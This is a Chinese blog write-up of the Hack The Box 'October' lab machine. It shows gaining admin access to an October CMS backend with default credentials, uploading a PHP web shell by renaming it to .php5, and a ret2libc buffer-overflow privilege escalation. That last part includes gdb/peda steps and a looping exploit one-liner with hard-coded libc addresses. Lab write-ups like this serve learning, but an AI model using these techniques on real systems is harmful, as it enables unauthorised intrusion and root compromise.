搜了一下october
有漏洞
然后默认的后台是/backend
试了一下密码admin:admin
竟然进去了????

有文件上传功能
shel.php
抓包
改成*.php5
右侧click here
拿到权限

dirb也扫出来后台了
但是我都已经不需要了
接下来是缓存区溢出了
正在看
所以就写到这吧

看了一晚上+一个白天
算是明白原理以及利用了

算了,直接贴传送门吧
国外大佬写的靶机教程
很详细

大概就是
1.检查防护
2.查看调用函数
3.通过脚本创造一个字符串(大一点的)
4.找到覆盖EIP的字节
5.通过脚本检查字节所在这个字符串的哪个位置
6.找到地址
7.生成漏洞利用脚本
8.运行得到root权限

安装
1.apt-get install gdb
2.git clone https://github.com/longld/peda.git ~/peda
3.echo "source ~/peda/peda.py" >> ~/.gdbinit
在Kali运行
1.gdb ./ovrflw
2.aslr
3.pdisass main
4.checksec
5.(再打开一个终端)pattern create 150
6.(在gdb运行)r '粘贴生成字符串'
7.(再刚才新打开的终端运行)pattern_offset 0x41384141
然后在靶机上运行
1.gdb /usr/local/bin/ovrflw -q
2.b main
3.run
4.p system
5.find 得到的字符串1, +9999999, “/bin/sh”
6.x/s 得到的字符串2
7.p exit
8.while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112+ "\x10\xc3\x59\xb7\x60\xf2\x58\xb7\xac\xeb\x6b\xb7"'); done

对于我现在的知识
解决它还是有点困难
有没有大佬推荐一下缓冲区溢出的学习教程的
奉上双膝

Hack the box靶机 October相关推荐

  1. Hack The Box靶机——Ambassador

    文章目录 前言 一.Web部分 二.提权部分 前言 难度:中等,Hack The Box网站在线靶机.本文涉及知识点有:Grafana系统任意文件读取,CURL下载文件,SSL本地端口转发,Consu ...

  2. Hack the box靶机 Admirer

    不能访问啊 wfuzz一下 wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,txt-php-html -u ...

  3. Hack the box靶机 Grandpa

    migrate进程迁移 win的题怎么都是用msf做的呢 看大佬们没有不用msf的

  4. Hack the box靶机 Chatterbox

    修改地址 把生成的字符串替换python里的

  5. Hack the box靶机 Soli

    突破口是oracle 就是真的慢 我快吐了 scott/tiger 不知道为什么老是连接不上 给我整不会了 但是我重启了一下 换了一个端口 然后就好了

  6. Hack The Box——Traverxec

    目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 内核提权 SUID提权 总结 简介 这个靶机还算比较简单,只需一步一步慢慢走下去就可以完成了.漏洞发现和利用都比较简单,使用已知漏洞可以直接获得we ...

  7. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

  8. Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限

    Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...

  9. Hack The Box - Starting Point - TIER 0

    Hack The Box - Starting Point - TIER 0 Meow TASK 1 What does the acronym VM stand for? 首字母缩略词 VM 代表什 ...

最新文章

  1. 深度学习可解释性问题如何解决?图灵奖得主Bengio有一个解
  2. python使用imbalanced-learn的BorderlineSMOTE方法进行上采样处理数据不平衡问题
  3. 听过TB、PB级大数据,ZB级的大数据探索与应用实践是怎么样的?【附PPT】
  4. 如果服务器开机显示NObootable,电脑不能开机提示No bootable device怎么办?
  5. 国人主导研发的 HAWQ® 成 Apache® 顶级项目
  6. java jdbc连接oracle_Java使用JDBC连接Oracle 11gR2
  7. LabView学习笔记(十):条件结构
  8. 使用Dism++安装系统(新手勿尝试)
  9. RN开发关闭所有黄色警告弹出(console.warn())
  10. ubuntu系统下安装gcc
  11. Android之简洁天气
  12. QTcpServer和QTcpSocket使用详解
  13. qt 5.12.1 下载安装详细教程
  14. DH密钥交换在实践中的安全问题
  15. CSS基础(P45-P65)
  16. 选购发烧游戏台式计算机的内存储器,游戏发烧友福音 惠普暗影精灵5 Super游戏台式电脑评测...
  17. pytohn 操作excel表格常用模块 xlwt xlsxwriter
  18. 什么是独立站,独立站的作用是什么?
  19. 程序员是什么又代表这多少角色?你想过吗?
  20. pytorch股票预测

热门文章

  1. API接口安全思考和最佳实践
  2. css3橙色球形_CSS3橙色的星球绕轨道公转动画_html/css_WEB-ITnose -
  3. django html菜单,使用Django模板的导航菜单
  4. ARMV8体系结构简介:AArch64系统级体系结构之Self-hosted debug
  5. ipython怎么念_如何读取IPython%prun(profiler)命令的输出? - python
  6. 历年CSP-J(NOIP普及组)分类汇总目录
  7. C语言程序设计——用户密码输入与判断
  8. 详解视频封装格式之MP4
  9. 微信小程序——修改radio组件的大小
  10. PTA 7-114 用if-else语句编程百分制成绩转换为五分制成绩